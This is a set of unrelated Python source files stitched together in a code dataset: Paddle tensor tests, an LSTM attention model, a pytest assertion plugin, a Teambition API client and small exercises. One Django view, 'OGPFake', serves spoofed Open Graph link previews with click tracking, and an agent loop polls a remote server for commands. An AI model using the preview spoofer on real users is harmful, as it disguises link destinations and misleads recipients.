        inps = paddle.to_tensor(array, stop_gradient=False)
        value = paddle.to_tensor(value, stop_gradient=False)
        loss = set_value4(inps, value)
        loss.backward()
        value_grad = np.array([[[600.], [606.]]])
        input_grad = np.array([[[[[0.], [32.], [108.],
                                  [0.]]], [[[0.], [864.], [1372.], [0.]]],
                                [[[0.], [4000.], [5324.], [0.]]]],
                               [[[[8788.], [10976.], [13500.], [16384.]]],
                                [[[19652.], [23328.], [27436.], [32000.]]],
                                [[[37044.], [42592.], [48668.], [55296.]]]]])
        self._assert_grad_equal(inps.grad.numpy(), input_grad, "input")
        self._assert_grad_equal(value.grad.numpy(), value_grad, "value")

        # case 5: a[0].shape == value.shape
        def set_value5(t, value):
            a = t * t
            a[0] = value
            y = a * a
            return y.sum()

        array = np.arange(1, 1 + 2 * 3 * 4, dtype="float32").reshape([2, 3, 4])
        value = np.arange(100, 100 + 12, dtype="float32").reshape(3, 4)
        inps = paddle.to_tensor(array, stop_gradient=False)
        value = paddle.to_tensor(value, stop_gradient=False)
        loss = set_value5(inps, value)
        loss.backward()
        value_grad = np.array([[200., 202., 204., 206.],
                               [208., 210., 212., 214.],
                               [216., 218., 220., 222.]])
        input_grad = np.array([[[0., 0., 0., 0.], [0., 0., 0., 0.],
                                [0., 0., 0., 0.]],
                               [[8788., 10976., 13500., 16384.],
                                [19652., 23328., 27436., 32000.],
                                [37044., 42592., 48668., 55296.]]])
        self._assert_grad_equal(inps.grad.numpy(), input_grad, "input")
        self._assert_grad_equal(value.grad.numpy(), value_grad, "value")

        # case 6: pass stop_gradient from value to x
        x = paddle.zeros([8, 8], dtype='float32')
        value = paddle.to_tensor([10], dtype='float32', stop_gradient=False)
        self.assertTrue(x.stop_gradient)
        self.assertTrue(x.is_leaf)
        x[0, :] = value
        # Fixed: previously `assertTrue(~x.stop_gradient)` — for a Python
        # bool, ~True == -2 and ~False == -1 are both truthy, so the check
        # always passed regardless of the flag's value.
        self.assertFalse(x.stop_gradient)
        self.assertFalse(x.is_leaf)

    def test_static_graph(self):
        """Static graph: drive the raw set_value op via LayerHelper with
        different stop_gradient combinations and check forward results."""
        paddle.enable_static()

        to_string = lambda x, i: x + '_' + str(i)
        numel = lambda input_shape: reduce(lambda x, y: x * y, input_shape)

        def op1(x):
            value = paddle.fluid.layers.fill_constant([1], "float32", 1)
            # test stop_gradient
            value.stop_gradient = True
            x.stop_gradient = False
            start = paddle.fluid.layers.fill_constant(
                [1], "int32", 5, force_cpu=True)
            end = paddle.fluid.layers.fill_constant(
                [1], "int32", 0, force_cpu=True)
            step = paddle.fluid.layers.fill_constant(
                [1], "int32", -2, force_cpu=True)
            inputs = {
                'Input': x,
                'ValueTensor': value,
                'StartsTensorList': [start, ],
                'EndsTensorList': [end, ],
                'StepsTensorList': [step, ]
            }
            helper = LayerHelper("set_value")
            y = helper.create_variable_for_type_inference(dtype=x.dtype)
            helper.append_op(
                type="set_value",
                inputs=inputs,
                outputs={'Out': y},
                attrs={'axes': [0]})
            return y, value

        def op2(x):
            value = paddle.fluid.layers.fill_constant([1, 3, 2], "float32", 1)
            # test stop_gradient
            value.stop_gradient = False
            x.stop_gradient = False
            attrs = {
                'axes': [0],
                'starts': [6],
                'ends': [0],
                'steps': [-4],
                'decrease_axes': [],
                'none_axes': [],
                'dtype': paddle.float32
            }
            inputs = {'Input': x, 'ValueTensor': value}
            helper = LayerHelper("set_value")
            y = helper.create_variable_for_type_inference(dtype=x.dtype)
            helper.append_op(
                type="set_value",
                inputs=inputs,
                outputs={'Out': y},
                attrs=attrs)
            return y, value

        def op3(x):
            value = paddle.fluid.layers.fill_constant([1], "float32", 1)
            x.stop_gradient = True
            value.stop_gradient = False
            start = paddle.fluid.layers.fill_constant(
                [1], "int32", 0, force_cpu=True)
            end = paddle.fluid.layers.fill_constant(
                [1], "int32", 5, force_cpu=True)
            step = paddle.fluid.layers.fill_constant(
                [1], "int32", 3, force_cpu=True)
            inputs = {
                'Input': x,
                'ValueTensor': value,
                'StartsTensorList': [start, ],
                'EndsTensorList': [end, ],
                'StepsTensorList': [step, ]
            }
            helper = LayerHelper("set_value")
            y = helper.create_variable_for_type_inference(dtype=x.dtype)
            helper.append_op(
                type="set_value",
                inputs=inputs,
                outputs={'Out': y},
                attrs={'axes': [0]})
            return y, value

        def set_value(array, i, op):
            name_x = to_string('x', i)
            x = paddle.static.data(
                name=name_x, shape=array.shape, dtype='float32')
            # set_value_op in __get/setitem__ is an inplace operation.
            # When `input.stop_gradient = True` and `value.stop_gradient = False`,
            # set_value_grad_op will not be run during backward.
            y, value = op(x)
            y2 = y + 1
            loss = paddle.fluid.layers.reduce_sum(y2)
            sgd = paddle.optimizer.Adam()
            sgd.minimize(loss)
            place = paddle.fluid.CPUPlace(
            ) if not paddle.fluid.core.is_compiled_with_cuda(
            ) else paddle.fluid.CUDAPlace(0)
            prog = paddle.static.default_main_program()
            exe = paddle.static.Executor(place)
            exe.run(paddle.static.default_startup_program())
            fetch_list = []
            if not x.stop_gradient:
                fetch_list.append(x.grad_name)
            if not value.stop_gradient:
                fetch_list.append(value.grad_name)
            out = exe.run(prog, feed={x.name: array}, fetch_list=fetch_list)
            return out

        input_shape = [7, 6, 5, 4, 3, 2]
        array = np.arange(
            0, numel(input_shape), dtype="float32").reshape(input_shape)
        # Re-run the three op variants at every rank from 6 down to 1.
        for i in range(len(input_shape)):
            program = paddle.static.Program()
            with paddle.static.program_guard(program):
                out1 = set_value(array, i, op1)
                self.assertTrue((out1[0][5:0:-2] == 0).all())
            if len(array.shape) > 2:
                program2 = paddle.static.Program()
                with paddle.static.program_guard(program2):
                    out2 = set_value(array, i, op2)
                    self.assertTrue((out2[0][6:0:-4] == 0).all())
            program3 = paddle.static.Program()
            with paddle.static.program_guard(program3):
                out3 = set_value(array, i, op3)
                self.assertTrue((numel(out1[0][0:5:3].shape) == out3[0]).all())
            array = array[0]
class TestSetValueInplaceLeafVar(unittest.TestCase):
    def test_inplace_var_become_leaf_var(self):
        # Gradients of a/b must be identical whether c is reduced directly or
        # first written into a slice of a fresh (leaf) tensor d.
        paddle.disable_static()
        a_grad_1, b_grad_1, a_grad_2, b_grad_2 = 0, 1, 2, 3
        with paddle.fluid.dygraph.guard():
            paddle.seed(100)
            a = paddle.rand(shape=[1, 4])
            b = paddle.rand(shape=[1, 4])
            a.stop_gradient = False
            b.stop_gradient = False
            c = a / b
            c.sum().backward()
            a_grad_1 = a.grad.numpy()
            b_grad_1 = b.grad.numpy()
        with paddle.fluid.dygraph.guard():
            # Same seed, so a and b are identical to the first run.
            paddle.seed(100)
            a = paddle.rand(shape=[1, 4])
            b = paddle.rand(shape=[1, 4])
            a.stop_gradient = False
            b.stop_gradient = False
            c = a / b
            d = paddle.zeros((4, 4))
            self.assertTrue(d.stop_gradient)
            d[0, :] = c
            # Assigning a grad-requiring value flips d's stop_gradient.
            self.assertFalse(d.stop_gradient)
            d[0, :].sum().backward()
            a_grad_2 = a.grad.numpy()
            b_grad_2 = b.grad.numpy()
        self.assertTrue(np.array_equal(a_grad_1, a_grad_2))
        self.assertTrue(np.array_equal(b_grad_1, b_grad_2))
        paddle.enable_static()
# Script entry point: run all discovered unittest cases.
if __name__ == '__main__':
    unittest.main()
| StarcoderdataPython |
def compute_bonus(initial_number):
    """Return the total bonus for *initial_number*.

    Base bonus: 5 points when the number is <= 100, 20% of the number when it
    is in (100, 1000], and 10% when it is above 1000. On top of that: +1 when
    the number is even and +2 when its last digit is 5.
    """
    if initial_number <= 100:
        base_bonus = 5
    elif initial_number <= 1000:
        base_bonus = initial_number * 0.2
    else:
        base_bonus = initial_number * 0.1
    parity_bonus = 1 if initial_number % 2 == 0 else 0
    last_digit_bonus = 2 if initial_number % 10 == 5 else 0
    return base_bonus + parity_bonus + last_digit_bonus


def main():
    """Read a number from stdin and print the bonus and the boosted total."""
    initial_number = int(input())
    all_bonuses = compute_bonus(initial_number)
    print(f'{all_bonuses}')
    print(f'{initial_number + all_bonuses}')


# Guarded so importing this module no longer blocks on input().
if __name__ == '__main__':
    main()
| StarcoderdataPython |
3384864 | <gh_stars>1-10
import torch
import numpy as np
import torch.nn.functional as F
from torch import nn, optim
import torch.nn.utils.rnn as rnn_utils
class SentLSTM(nn.Module):
    """LSTM sentence encoder over pre-embedded, padded sentences.

    forward() packs the variable-length batch, runs an (optionally
    bidirectional) LSTM and returns one vector per sentence taken from the
    final hidden state — both directions concatenated when bidirectional, so
    the output is (batch, 2*hidden_dim) or (batch, hidden_dim).
    """

    def __init__(self, embedding_dim, hidden_dim, batch_size, bi_direction=True):
        super(SentLSTM, self).__init__()
        self.hidden_dim = hidden_dim
        self.bi_direction = bi_direction
        self.sent_lstm = nn.LSTM(embedding_dim, hidden_dim,
                                 bidirectional=bi_direction)
        self.sent_hidden = self.init_hidden(batch_size)

    def init_hidden(self, batch_size):
        """Return fresh random (h0, c0) for *batch_size* sentences.

        Placed on GPU when CUDA is available (consolidates the previous
        duplicated CPU/GPU branches).  NOTE(review): randomly initialised
        hidden state (randn, not zeros) makes forward() non-deterministic
        across calls — confirm this is intentional.
        """
        bi = 2 if self.bi_direction else 1
        device = "cuda" if torch.cuda.is_available() else "cpu"
        return (torch.randn(bi, batch_size, self.hidden_dim, device=device),
                torch.randn(bi, batch_size, self.hidden_dim, device=device))

    def forward(self, sentences, sent_lens):
        """Encode a (batch, seq, embedding_dim) tensor of embedded sentences.

        sent_lens holds the true (unpadded) length of each sentence; the batch
        is sorted by length for pack_padded_sequence and the representations
        are restored to the original order before returning.
        """
        self.sent_hidden = self.init_hidden(len(sentences))
        sorted_sent_lens, indices = torch.sort(sent_lens, descending=True)
        # Sorting `indices` back gives the permutation that undoes the sort.
        _, desorted_indices = torch.sort(indices, descending=False)
        sorted_sentences = sentences[indices]
        packed_sentences = rnn_utils.pack_padded_sequence(
            sorted_sentences, sorted_sent_lens, batch_first=True)
        lstm_out, self.sent_hidden = self.sent_lstm(packed_sentences,
                                                    self.sent_hidden)
        if self.bi_direction:
            # h_n is (num_layers * 2, batch, hidden): the last two entries are
            # the final forward and backward states of the top layer.
            sent_reps = torch.cat(
                [self.sent_hidden[0][-2], self.sent_hidden[0][-1]], dim=1)
            sent_reps = sent_reps[desorted_indices]
        else:
            sent_reps = self.sent_hidden[0][-1][desorted_indices]
        return sent_reps
class LSTMBiA(nn.Module):
    """Conversation / user-history matcher with BiDAF-style bi-attention.

    Each sentence (conversation turn or user-history entry) is encoded by a
    shared ``SentLSTM``.  A bi-directional attention (conv->history and
    history->conv) is computed between the two encoded sequences, and a
    final modelling LSTM over the attended conversation produces one
    sigmoid score per conversation.
    """

    def __init__(self, config):
        super(LSTMBiA, self).__init__()
        self.word_embedding = nn.Embedding(config.vocab_num, config.embedding_dim, padding_idx=0)
        if config.embedding_matrix is not None:
            # Initialise from pre-trained word vectors when supplied.
            self.word_embedding.load_state_dict({'weight': config.embedding_matrix})
        self.embedding_dim = config.embedding_dim
        # Hidden size per direction; bidirectional outputs concatenate back
        # to config.hidden_dim.
        self.hidden_dim = config.hidden_dim // 2
        self.batch_size = config.batch_size
        self.use_gpu = config.use_gpu
        self.conv_num_layer = 1
        self.model_num_layer = 2
        self.bi_direction = True
        self.dropout = nn.Dropout(config.dropout)  # NOTE(review): defined but never applied in forward() -- confirm intent
        self.mode = 'train'  # or 'test'
        self.sent_lstm = SentLSTM(self.embedding_dim, self.hidden_dim, self.batch_size)
        self.conv_lstm = nn.LSTM(config.hidden_dim, self.hidden_dim, num_layers=self.conv_num_layer, bidirectional=True)
        self.conv_hidden = self.init_hidden(self.batch_size, self.conv_num_layer)
        # Trilinear-style similarity over [conv; his; conv * his].
        self.similarity = nn.Linear(config.hidden_dim * 3, 1)
        self.model_lstm = nn.LSTM(config.hidden_dim, self.hidden_dim, dropout=config.dropout, num_layers=self.model_num_layer, bidirectional=True)
        self.model_hidden = self.init_hidden(self.batch_size, self.model_num_layer)
        self.layer1 = nn.Linear(config.hidden_dim * 4, config.hidden_dim * 2)
        self.layer2 = nn.Linear(config.hidden_dim * 2, config.hidden_dim)
        self.out_layer = nn.Linear(config.hidden_dim, 1)  # Giving the final prediction
        self.final = nn.Sigmoid()

    def init_hidden(self, batch_size, num_layer):
        """Return fresh random (h0, c0) for an LSTM with ``num_layer`` layers."""
        bi = 2 if self.bi_direction else 1
        # Fix: also require self.use_gpu, matching the device check used in
        # forward(); previously a CPU model on a CUDA-capable machine
        # received CUDA hidden states and crashed with a device mismatch.
        if torch.cuda.is_available() and self.use_gpu:  # run in GPU
            return (torch.randn(bi * num_layer, batch_size, self.hidden_dim).cuda(),
                    torch.randn(bi * num_layer, batch_size, self.hidden_dim).cuda())
        else:
            return (torch.randn(bi * num_layer, batch_size, self.hidden_dim),
                    torch.randn(bi * num_layer, batch_size, self.hidden_dim))

    def forward(self, convs, conv_lens, conv_turn_lens, users, user_lens, user_turn_lens):
        """Score each conversation in the batch against its user's history.

        :param convs: padded word-id tensor of conversation turns
        :param conv_lens: number of real turns per conversation
        :param conv_turn_lens: per-conversation word counts for each turn
        :param users: user-history sentences (tensor in train mode)
        :param user_lens: number of history sentences per user
        :param user_turn_lens: unused; history lengths are recomputed from padding
        :return: (per-conversation sigmoid scores, final conversation representations)
        """
        self.conv_hidden = self.init_hidden(len(convs), self.conv_num_layer)
        self.model_hidden = self.init_hidden(len(convs), self.model_num_layer)
        # --- encode every conversation's turns with the shared sentence LSTM ---
        conv_reps = []
        for c in range(len(convs)):
            if torch.cuda.is_available() and self.use_gpu:  # run in GPU
                sent_reps = self.sent_lstm(self.word_embedding(convs[c, :conv_lens[c]].cuda()), torch.LongTensor(conv_turn_lens[c][:conv_lens[c]]).cuda())
            else:
                sent_reps = self.sent_lstm(self.word_embedding(convs[c, :conv_lens[c]]), torch.LongTensor(conv_turn_lens[c][:conv_lens[c]]))
            conv_reps.append(sent_reps)
        # Sort by turn count so pack_padded_sequence accepts the batch, and
        # keep the inverse permutation to restore the original order later.
        sorted_conv_turn_nums, sorted_conv_indices = torch.sort(torch.LongTensor(conv_lens), descending=True)
        _, desorted_conv_indices = torch.sort(sorted_conv_indices, descending=False)
        sorted_conv_reps = []
        for index in sorted_conv_indices:
            sorted_conv_reps.append(conv_reps[index])
        paded_convs = rnn_utils.pad_sequence(sorted_conv_reps)
        packed_convs = rnn_utils.pack_padded_sequence(paded_convs, sorted_conv_turn_nums)
        conv_out, self.conv_hidden = self.conv_lstm(packed_convs, self.conv_hidden)
        conv_out = rnn_utils.pad_packed_sequence(conv_out, batch_first=True)[0]
        conv_out = conv_out[desorted_conv_indices]  # restore original batch order
        # --- assemble the user history (test mode appends the final turn) ---
        if self.mode == 'test':
            user_history = []
            for u in range(len(users)):
                current_user = [users[u, i] for i in range(user_lens[u])]
                current_user.append(convs[u, conv_lens[u]-1])
                current_user = rnn_utils.pad_sequence(current_user, batch_first=True)
                user_history.append(current_user)
                user_lens[u] += 1
        else:
            user_history = users
        sorted_his_lens, sorted_his_indices = torch.sort(torch.LongTensor(user_lens), descending=True)
        _, desorted_his_indices = torch.sort(sorted_his_indices, descending=False)
        sorted_user_history = []
        for index in sorted_his_indices:
            sorted_user_history.append(user_history[index])
        his_out = []
        his_num = 0
        for one_his in sorted_user_history:
            # Recover true sentence lengths by counting padding zeros.
            sent_lens = []
            for sent in one_his[:sorted_his_lens[his_num]]:
                zero_num = torch.sum(sent == 0)  # find if there are 0s for padding
                sent_lens.append(len(sent) - zero_num)
            # Fix: also require self.use_gpu here, consistent with the
            # conversation-encoding branch above (was cuda-availability only).
            if torch.cuda.is_available() and self.use_gpu:  # run in GPU
                his_out.append(self.sent_lstm(self.word_embedding(one_his[:sorted_his_lens[his_num]].cuda()), torch.LongTensor(sent_lens).cuda()))
            else:
                his_out.append(self.sent_lstm(self.word_embedding(one_his[:sorted_his_lens[his_num]]), torch.LongTensor(sent_lens)))
            his_num += 1
        his_out = rnn_utils.pad_sequence(his_out, batch_first=True)
        his_out = his_out[desorted_his_indices]
        # --- BiDAF-style bi-directional attention ---
        batch_size = conv_out.size(0)
        conv_sent_len = conv_out.size(1)
        his_sent_len = his_out.size(1)
        hidden_dim = conv_out.size(-1)
        # Pair every conversation turn with every history sentence.
        conv_rep = conv_out.repeat(1, 1, his_sent_len).view(batch_size, conv_sent_len * his_sent_len, -1)
        his_rep = his_out.repeat(1, conv_sent_len, 1)
        sim_matrix = torch.cat([conv_rep, his_rep, conv_rep * his_rep], -1).view(batch_size, conv_sent_len, his_sent_len, -1)
        sim_matrix = self.similarity(sim_matrix)
        sim_matrix = sim_matrix.squeeze(-1)
        # conv -> history: each turn attends over the history sentences.
        atten_c2h = F.softmax(sim_matrix, dim=-1)
        atten_c2h = atten_c2h.unsqueeze(-1).repeat(1, 1, 1, hidden_dim)
        atten_c2h = atten_c2h * his_out.unsqueeze(1)
        atten_c2h = atten_c2h.sum(2)
        # history -> conv: a single attention distribution over the turns.
        atten_h2c = F.softmax(sim_matrix.max(2)[0], dim=-1)
        atten_h2c = atten_h2c.unsqueeze(-1) * conv_out
        atten_h2c = atten_h2c.sum(1)
        atten_h2c = atten_h2c.unsqueeze(1).repeat(1, conv_sent_len, 1)
        conv_rep_atten = torch.cat([conv_out, atten_c2h, conv_out * atten_c2h, conv_out * atten_h2c], dim=-1)
        conv_rep_atten = F.relu(self.layer1(conv_rep_atten))
        conv_rep_atten = F.relu(self.layer2(conv_rep_atten))
        # --- modelling LSTM over the attended conversation ---
        sorted_conv_rep_atten = conv_rep_atten[sorted_conv_indices]
        packed_conv_rep_atten = rnn_utils.pack_padded_sequence(sorted_conv_rep_atten, sorted_conv_turn_nums, batch_first=True)
        _, self.model_hidden = self.model_lstm(packed_conv_rep_atten, self.model_hidden)
        if self.bi_direction:
            model_out = torch.cat([self.model_hidden[0][-2], self.model_hidden[0][-1]], dim=1)
        else:
            model_out = self.model_hidden[0][-1]
        model_out = model_out[desorted_conv_indices]
        conv_labels = self.final(self.out_layer(model_out).view(-1))
        return conv_labels, model_out
| StarcoderdataPython |
3369311 | <filename>pythonExercicios/ex092.py<gh_stars>0
from datetime import datetime as dt
# Interactive exercise: collect a worker's data (pt-BR prompts) and derive
# age and retirement information into a single dict.
dados = {}
dados['Nome'] = input('Nome: ')
nasc = int(input('Ano de nascimento: '))
novos_dados = {
    'Idade': dt.now().year - nasc,
    'Carteira de trabalho': int(input('Carteira de trabalho (0 não tem):'))}
dados.update(novos_dados)
# Only workers holding a work permit (> 0) are asked for contract/salary data.
if dados['Carteira de trabalho'] > 0:
    novos_dados = {
        'Ano de contratação': int(input('Ano de contratação: ')),
        'Salário': float(input('Salário: '))}
    dados.update(novos_dados)
    # Retirement age = 35 years of contribution counted from the hiring year.
    dados['Idade de aposentadoria'] = 35 + dados['Ano de contratação'] - nasc
print('-='*30)
# Dump every collected key/value pair.
for k, i in dados.items():
    print(f'{k} tem o valor de {i}')
| StarcoderdataPython |
1732346 | # -*- coding: utf-8 -*-
# Generated by Django 1.11.15 on 2018-10-12 13:19
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
    """Auto-generated migration: drop the ``average`` field from ``Reviews``."""
    dependencies = [
        ('projects', '0004_reviews_average'),
    ]
    operations = [
        migrations.RemoveField(
            model_name='reviews',
            name='average',
        ),
    ]
| StarcoderdataPython |
3206280 | """
Views for OGPFake
This view gathers all necessary tags from GET request,
then gets information from environmental variables and renders the final page.
<NAME>, 2018, https://github.com/Naeriam
"""
import os
from django.shortcuts import render
def ogpfake(request):
    """Render a fake Open Graph preview page.

    Each expected GET parameter names an environment variable (a Heroku
    "Config Var"); the variable's value supplies the corresponding OGP tag.
    Missing parameters/values are reported as human-readable errors in the
    rendered page instead of failing.

    :param request: Django ``HttpRequest``.
    :return: ``HttpResponse`` rendering ``ogpfake.html``.
    """
    def env_from_param(name):
        # Resolve GET param -> environment-variable value, or None when the
        # parameter was not supplied (or the variable is unset).
        if name not in request.GET:
            return None
        return os.getenv(request.GET.get(name))

    ga_tracking_id = env_from_param('ga_tracking_id')
    title = env_from_param('title')
    description = env_from_param('description')
    url = env_from_param('url')
    image = env_from_param('image')

    # Error control: one message per missing value.
    # (Typo fixed: "especified" -> "specified".)
    error_text = '{0} has not been specified. Ensure you have a KEY name in your GET request ' \
                 'and a VALUE in your Heroku Config Vars'
    errors = []
    if not ga_tracking_id:
        errors.append(error_text.format('Google Analytics ID'))
    if not title:
        errors.append(error_text.format('A title for your link'))
    if not description:
        errors.append(error_text.format('A description for your link'))
    if not url:
        errors.append(error_text.format('A destination URL'))
    if not image:
        errors.append(error_text.format('An image for your link'))

    # Render web page
    return render(request, 'ogpfake.html', {
        'ga_tracking_id': ga_tracking_id,
        'title': title,
        'description': description,
        'url': url,
        'image': image,
        'errors': errors,
    })
| StarcoderdataPython |
3305145 | """
support for presenting detailed information in failing assertions.
"""
import py
import sys
from _pytest.monkeypatch import monkeypatch
from _pytest.assertion import util
def pytest_addoption(parser):
    """Register the ``--assert`` option and its deprecated aliases."""
    group = parser.getgroup("debugconfig")
    group.addoption('--assert', action="store", dest="assertmode",
                    choices=("rewrite", "reinterp", "plain",),
                    default="rewrite", metavar="MODE",
                    help="""control assertion debugging tools.
'plain' performs no assertion debugging.
'reinterp' reinterprets assert statements after they failed to provide assertion expression information.
'rewrite' (the default) rewrites assert statements in test modules on import
to provide assert expression information. """)
    # Deprecated spellings kept for backward compatibility; either one
    # forces the equivalent of --assert=plain in pytest_configure().
    group.addoption('--no-assert', action="store_true", default=False,
                    dest="noassert", help="DEPRECATED equivalent to --assert=plain")
    group.addoption('--nomagic', '--no-magic', action="store_true",
                    default=False, help="DEPRECATED equivalent to --assert=plain")
class AssertionState:
    """Runtime state of the assertion plugin.

    Holds the active assertion ``mode`` ("rewrite", "reinterp" or
    "plain") and a trace function obtained from the config's trace root.
    """

    def __init__(self, config, mode):
        self.trace = config.trace.root.get("assertion")
        self.mode = mode
def pytest_configure(config):
    """Select the assertion mode, patch AssertionError, and install the
    rewriting import hook when requested.

    Falls back from "rewrite" to "reinterp" on interpreters whose AST
    support is broken, and to "plain" when the deprecated flags are set.
    """
    mode = config.getvalue("assertmode")
    if config.getvalue("noassert") or config.getvalue("nomagic"):
        # Deprecated --no-assert / --nomagic force plain mode.
        mode = "plain"
    if mode == "rewrite":
        try:
            import ast  # noqa
        except ImportError:
            mode = "reinterp"
        else:
            # Both Jython and CPython 2.6.0 have AST bugs that make the
            # assertion rewriting hook malfunction.
            if (sys.platform.startswith('java') or
                    sys.version_info[:3] == (2, 6, 0)):
                mode = "reinterp"
    if mode != "plain":
        _load_modules(mode)
        m = monkeypatch()
        # Undo the patch when the config is torn down.
        config._cleanup.append(m.undo)
        m.setattr(py.builtin.builtins, 'AssertionError',
                  reinterpret.AssertionError)  # noqa
    hook = None
    if mode == "rewrite":
        hook = rewrite.AssertionRewritingHook()  # noqa
        # Insert first so test-module imports hit the rewriter before any
        # other meta-path importer.
        sys.meta_path.insert(0, hook)
    warn_about_missing_assertion(mode)
    config._assertstate = AssertionState(config, mode)
    config._assertstate.hook = hook
    config._assertstate.trace("configured with mode set to %r" % (mode,))
def pytest_unconfigure(config):
    """Uninstall the assertion-rewriting import hook, if one was installed."""
    rewriting_hook = config._assertstate.hook
    if rewriting_hook is None:
        return
    sys.meta_path.remove(rewriting_hook)
def pytest_collection(session):
    """Attach the collection session to the rewrite hook.

    This hook is only called when test modules are collected, so it is
    never triggered in e.g. the pytest-xdist master process (which does
    not collect test modules itself).
    """
    rewriting_hook = session.config._assertstate.hook
    if rewriting_hook is not None:
        rewriting_hook.set_session(session)
def pytest_runtest_setup(item):
    """Install the per-item comparison-explanation callback."""
    def callbinrepr(op, left, right):
        # Ask plugins for a rich explanation of `left <op> right`; the
        # first non-empty result wins.
        hook_result = item.ihook.pytest_assertrepr_compare(
            config=item.config, op=op, left=left, right=right)
        for new_expl in hook_result:
            if new_expl:
                # Don't include pageloads of data unless we are very
                # verbose (-vv)
                if (len(py.builtin._totext('').join(new_expl[1:])) > 80*8
                        and item.config.option.verbose < 2):
                    new_expl[1:] = [py.builtin._totext(
                        'Detailed information truncated, use "-vv" to see')]
                res = py.builtin._totext('\n~').join(new_expl)
                if item.config.getvalue("assertmode") == "rewrite":
                    # The result will be fed back a python % formatting
                    # operation, which will fail if there are extraneous
                    # '%'s in the string. Escape them here.
                    res = res.replace("%", "%%")
                return res
    util._reprcompare = callbinrepr
def pytest_runtest_teardown(item):
    """Remove the per-item comparison-explanation callback."""
    util._reprcompare = None
def pytest_sessionfinish(session):
    """Drop the rewrite hook's reference to the finished session."""
    rewriting_hook = session.config._assertstate.hook
    if rewriting_hook is not None:
        rewriting_hook.session = None
def _load_modules(mode):
    """Lazily import assertion related code."""
    # Imported lazily so "plain" mode never pays for (or trips over) the
    # reinterpretation/rewriting machinery.
    global rewrite, reinterpret
    from _pytest.assertion import reinterpret  # noqa
    if mode == "rewrite":
        from _pytest.assertion import rewrite  # noqa
def warn_about_missing_assertion(mode):
    """Warn on stderr when assert statements are disabled (python -O)."""
    asserts_enabled = False
    try:
        assert False
    except AssertionError:
        asserts_enabled = True
    if asserts_enabled:
        return
    if mode == "rewrite":
        specifically = ("assertions which are not in test modules "
                        "will be ignored")
    else:
        specifically = "failing tests may report as passing"
    sys.stderr.write("WARNING: " + specifically +
                     " because assert statements are not executed "
                     "by the underlying Python interpreter "
                     "(are you using python -O?)\n")
pytest_assertrepr_compare = util.assertrepr_compare
| StarcoderdataPython |
3207431 | <reponame>joshriess/InfraBot<filename>agent/agent.py
import requests
from time import sleep

# Simple polling agent: forever fetch this agent's command list from the
# InfraBot server, report the result, then sleep until the next callout.
timeToWait = 300 # Time to wait between callouts (in seconds)
while (True):
    # Get list of commands to run this callout
    # NOTE(review): agent id 4 is hard-coded in the URL -- confirm this is intended.
    URL = "https://slack.flemingcaleb.com:5000/api/agent/4/command/"
    r = requests.get(url=URL)
    if r.status_code == requests.codes.ok:
        # Process the list of requests
        # NOTE(review): commands are only printed, not executed, here.
        print(r)
    elif r.status_code == requests.codes.not_found:
        # No list this time
        print("No list this time")
    else:
        #Handle Unintended Error
        print("ERROR")
    sleep(timeToWait)
4827558 | # -*- coding: utf-8 -*-
from __future__ import absolute_import, unicode_literals
from optionaldict import optionaldict
from teambition.api.base import TeambitionAPI
class Teams(TeambitionAPI):
    """Teambition team API wrapper (docstrings translated to English)."""

    def get(self, id=None, organization_id=None, project_id=None):
        """
        Get team(s)

        See
        http://docs.teambition.com/wiki/teams#teams-get

        :param id: optional, team ID
        :param organization_id: optional, organization ID
        :param project_id: optional, project ID
        :return: parsed JSON response
        """
        if id:
            endpoint = 'api/teams/{0}'.format(id)
        else:
            endpoint = 'api/teams'
        params = optionaldict(
            _organizationId=organization_id,
            _projectId=project_id
        )
        return self._get(endpoint, params=params)

    def create(self, name, organization_id=None):
        """
        Create a team

        See
        http://docs.teambition.com/wiki/teams#teams-create

        :param name: team name
        :param organization_id: optional, organization ID
        :return: parsed JSON response
        """
        data = optionaldict(
            name=name,
            _organizationId=organization_id
        )
        return self._post(
            'api/teams',
            data=data
        )

    def delete(self, id):
        """
        Delete a team

        See
        http://docs.teambition.com/wiki/teams#teams-delete

        :param id: team ID
        :return: parsed JSON response
        """
        return self._delete('api/teams/{0}'.format(id))

    def update(self, id, name):
        """
        Update a team

        See
        http://docs.teambition.com/wiki/teams#teams-update

        :param id: team ID
        :param name: team name
        """
        return self._put(
            'api/teams/{0}'.format(id),
            data={
                'name': name
            }
        )

    def bind_project(self, id, project_id):
        """
        Associate a team with a project

        See
        http://docs.teambition.com/wiki/teams#teams-bind-project

        :param id: team ID
        :param project_id: project ID
        :return: parsed JSON response
        """
        return self._put('api/teams/{0}/projects/{1}'.format(id, project_id))

    def unbind_project(self, id, project_id):
        """
        Dissociate a team from a project

        See
        http://docs.teambition.com/wiki/teams#teams-unbind-project

        :param id: team ID
        :param project_id: project ID
        :return: parsed JSON response
        """
        return self._delete(
            'api/teams/{0}/projects/{1}'.format(id, project_id)
        )

    def add_members(self, id, email):
        """
        Add team member(s)

        See
        http://docs.teambition.com/wiki/teams#teams-add-member

        :param id: team ID
        :param email: email address or list of email addresses
        :return: parsed JSON response
        """
        return self._post(
            'api/teams/{0}/members'.format(id),
            data={
                'email': email
            }
        )

    create_members = add_members

    def remove_member(self, id, user_id):
        """
        Remove a team member

        See
        http://docs.teambition.com/wiki/teams#teams-remove-member

        :param id: team ID
        :param user_id: member ID
        :return: parsed JSON response
        """
        return self._delete(
            'api/teams/{0}/members/{1}'.format(id, user_id)
        )

    def get_members(self, id, user_id=None):
        """
        Get team member(s)

        See
        http://docs.teambition.com/wiki/teams#teams-get-member

        :param id: team ID
        :param user_id: optional, user ID
        :return: parsed JSON response
        """
        if user_id:
            endpoint = 'api/teams/{0}/members/{1}'.format(id, user_id)
        else:
            endpoint = 'api/teams/{0}/members'.format(id)
        return self._get(endpoint)

    def quit(self, id):
        """
        Quit a team

        See
        http://docs.teambition.com/wiki/teams#teams-quit

        :param id: team ID
        :return: parsed JSON response
        """
        return self._put('api/teams/{0}/quit'.format(id))

    def get_memeber_tasks(self, id, member_id, start_date=None):
        """
        Get a team member's tasks

        See
        http://docs.teambition.com/wiki/teams#teams-get-team-member-tasks

        :param id: team ID
        :param member_id: member ID
        :param start_date: optional, start date; defaults to the start of the current week
        :return: parsed JSON response
        """
        params = optionaldict(startDate=start_date)
        return self._get(
            'api/teams/{0}/members/{1}/tasks'.format(id, member_id),
            params=params
        )

    # Correctly-spelled alias for the (misspelled) ``get_memeber_tasks``;
    # the old name is kept for backward compatibility, mirroring the
    # ``create_members = add_members`` pattern above.
    get_member_tasks = get_memeber_tasks

